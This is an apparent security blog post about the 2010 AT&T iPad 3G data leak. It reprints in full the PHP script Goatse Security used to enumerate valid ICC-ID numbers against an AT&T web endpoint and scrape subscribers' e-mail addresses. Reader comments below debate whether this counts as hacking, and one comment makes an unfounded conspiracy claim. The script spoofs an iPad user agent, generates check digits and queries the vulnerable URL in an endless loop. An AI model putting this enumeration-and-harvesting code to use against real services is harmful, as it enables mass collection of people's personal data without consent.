114,000 iPad Owners: The Script that Harvested Their E-mail Addresses

Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:

<?php // iPad 3G Account Slurper // // Usage: ./ipadump.php ICCID-base count // (The script generates the final checkdigit to produce ICCIDs from the entered base) $useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad $ICCIDroot = $_SERVER['argv'][1]; $ICCIDcount = $_SERVER['argv'][2]; function genluhn($number){ //Crappy home-made Luhn checkdigit generator $i = strlen($number)-1; do { $array[] = $number[$i]; $i--; } while ($i > -1); $i = 0; foreach ($array as $digit) { if (!($i & 1)){ $digit = $digit * 2; if ($digit >= 10) { $digit = $digit - 9; } } $total += $digit; $i++; } $luhn = 10 - ($total % 10); if ($luhn == 10) $luhn=0; return $luhn; } while (1) { //Continue FOREVER $ch = curl_init(); //Set up cURL curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to the ICCID curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0"); $output = curl_exec($ch); //Load first page with ICCID curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer"); $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info curl_close($ch); //print $output; //Prints HTML result if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten //Parse output. Terribly sloppy if (preg_match("/<title>Error<\/title>/", $output, $match)) { preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match); $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]); $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I want space between the period and the next sentence, dammit $errnum = strip_tags($match[0]); $status = "Error! ".$errnum; //Return specific error message } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) { $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]); $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address } else { $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix. } if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log. if ($counter == $ICCIDcount) exit; $ICCIDroot++; //step ICCID $counter++; //step loop counter } ?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it, an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no hack, no infiltration, and no breach, just a really poorly designed web application that returns e-mail address when ICCID is passed to it.

Filed Under: Enumeration

Tags: , ,

Comments (26)

Trackback URL | Comments RSS Feed

  1. jpatterson says:

    well, good for you!

  2. [...] upshot is that, as this page rightly points out (thanks to @securityninja for the link) “There’s no hack, no infiltration, and no [...]

  3. [...] reports that by exploiting a vulnerability in the AT&T Web site, hacker group Goatse Security was able to collect email addresses associated with the SIM [...]

  4. [...] Prefect has the actual PHP script itself, courtesy of Goatse member Weev, if you would like to take a look at it now that AT&T has fixed the [...]

  5. CaptainObvious says:

    “There’s no hack, no infiltration, and no breach, just a really poorly designed web application…”

    Like “real” hacks are all different somehow.

  6. [...] Web application that returns e-mail address when ICC-ID is passed to it,” says Praetorian Security Group in a blog post on the [...]

  7. John says:

    This is the very definition of a hack – “modification of a program or device to give the user access to features that were otherwise unavailable” You fake your user-agent and then hammer a URL, it’s called hacking. What is surprising is that AT&T didn’t have any Denial of Service measures in place, surely the one IP hitting this url a million times should have raised some alarms.

    • Prefect says:

      That’s kind of semantics right? Based on that definition, your browser is performing a “hack” right now to read this web site.

      I guess my point is that it doesn’t rise to the level of a criminal intrusion, being more akin to an NMAP scan, which is what popular media thinks of with the world “hack”.

  8. [...] auf praetorianprefect.com nach zu lesen ist, wurde mittels einem relativ einfachem PHP-Script ein Leck in einer AJAX-API [...]

  9. David Davidson says:

    Just by reading the description of the hack, one can easily visualize in his preferred programming language the way they did the job, just need the pattern of an ICC-ID, the script is pretty uninteresting at this point. It only shows that Gawker will pay anyone, even 4chan tards to discredit Apple in any way (as shown by the title which is false)

    • Prefect says:

      Seeing the script helped to make some sense out of what Gawker was reporting, and I had wanted to see the actual request to AT&T to see if there was anything more to it:

      https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

      Apple must have known how this worked at some level, and there owns some culpability for not objecting to the design. But the initial Gawker reporting was over the top and misleading.

      But you’re entitled to your opinion.

  10. [...] wrote a PHP script that flooded AT&T’s Web site with possible ICC-ID numbers and logged responses when the [...]

  11. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [...]

  12. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  13. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  14. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  15. jackie cox says:

    looks like an inside job by employee/coder at AT&T, purposfully writing vlunerable script for a PR Stunt involving Weev. A Cheap shot aimed at Apple/Google, through another interface.

    Just another windows/microsoft type sleazy goings on, who have a neverending viral problem, fixed by buying new computers and viral software, because of a poor operating system, compared to apple who fixes any breech virtually before it occurs for free.

    It may involve the israel-chinese affair of trying to boot google-apple because of their reluctance to censor data for pseudo-religious/political-business/competition reasons. And a really sleazy alogical jstification shot at not allowing some of apples new single face computers to be sold in isreal

    This is the great nothing, a cheap shot at a bad PR Stunt, taken up in the news media, who does as they are told

  16. [...] with law enforcement to investigate. To get the email addresses, the hackers took advantage of a home grown PHP script, which sent ICC ID numbers from SIM's to the AT&T server. The server was expecting to be called [...]

  17. [...] The script that harvested 114,000 iPad users’ data [...]

  18. FDunn says:

    If the data is in clear text, not protected and can simply be parsed I hardly call that a hack.

    That almost sounds like what goes on in any company every day. That data should have been behind a firewall.

    Sounds totally unresponsible on AT&Ts part.